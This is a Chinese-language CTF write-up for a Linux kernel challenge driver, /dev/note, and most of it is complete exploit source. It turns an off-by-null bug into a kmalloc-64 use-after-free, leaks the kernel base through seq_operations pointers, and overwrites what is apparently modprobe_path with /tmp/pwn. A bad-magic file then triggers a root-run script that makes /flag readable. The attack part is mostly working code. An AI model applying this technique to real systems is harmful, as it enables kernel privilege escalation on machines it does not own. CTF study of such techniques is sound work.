一道经典的off-by-null构造UAF。
做题时我假设kaslr,smep,smap,kpti全开。
漏洞在此处,off-by-null。
并且我们只能分配 ,kmalloc-32,kmalloc-64,kmalloc-128三种object。
1.泄露Kbase
由于是off-by-null,所以我们要保证构造UAF的object的地址是\x00结尾。由于kmalloc-32在内核中的使用过于平凡,风水很难控制,我选择使用kmalloc-64。
此处成功修改freelist。
现在考虑如何泄露基址。
kctl的系统调用没有实现,user_payload_struct用不了,只能考虑msg_msg。
msg_msg不能读,逆天。
最后只能用seq_op的函数指针泄露基址......................
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/xattr.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <stdint.h>void bind_cpu(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}struct list_head {uint64_t next;uint64_t prev;
};struct msg_msg {struct list_head m_list;uint64_t m_type;uint64_t m_ts;uint64_t next;uint64_t security;
};struct msg_msgseg {uint64_t next;
};/*
struct msgbuf {long mtype;char mtext[0];
};
*/int get_msg_queue(void)
{return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}/*** the msgp should be a pointer to the `struct msgbuf`,* and the data should be stored in msgbuf.mtext*/
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{((struct msgbuf*)msgp)->mtype = msgtyp;return msgsnd(msqid, msgp, msgsz, 0);
}/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{return msgrcv(msqid, msgp, msgsz, msgtyp, MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{msg->m_list.next = m_list_next;msg->m_list.prev = m_list_prev;msg->m_type = m_type;msg->m_ts = m_ts;msg->next = next;msg->security = security;
}int fd=0;void del(){size_t rr=0;ioctl(fd,0xC12ED002,&rr);
}void alloc(size_t size){ioctl(fd,0xC12ED001,&size);
}void edit(size_t size,size_t buf){size_t req[2]={size,buf};ioctl(fd,0xC12ED003,req);
}void get_msg(size_t size,size_t buf){size_t req[2]={size,buf};ioctl(fd,0xC12ED004,req);
}void get_flag()
{system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/pwn");system("chmod +x /tmp/pwn");system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/good");system("chmod +x /tmp/good");system("/tmp/good");sleep(1);system("cat /flag");exit(0);
}int stat[0xfd];
int kstat;
int jstat;
int pstat;
size_t fill[4]={0,0,0,0};
size_t path;
char* buf="/tmp/pwn\x00\x00\x00\x00\x00\x00\x00\x00";
int qu;
char mm[4068];int main(){bind_cpu(0);fd=open("/dev/note",0);memset(mm,'A',4048);memcpy(mm+4056,buf,16);qu=get_msg_queue();if(fd<0)printf("open rwctf fail\n");int i=0;for(;i<0xfd;i++)stat[i]=open("/proc/self/stat",0);alloc(0x20);edit(0x20,fill);kstat=open("/proc/self/stat",0);jstat=open("/proc/self/stat",0);size_t leak[0x4];get_msg(0x20,leak);size_t stt=leak[0];printf("stt:%lx;\n",stt);size_t kernel_base=stt-0x113be60;printf("kernel_base:%lx;\n",kernel_base);path=kernel_base+0x1c2c538;close(jstat);edit(0x8,&path);jstat=open("/proc/self/stat",0);write_msg(qu,mm,4072,1);//del();get_flag();return 0;
}
以上的exp是gdb挂着的情况下,gdb貌似会影响风水,在没gdb的情况下,要把fd改成f6。
)
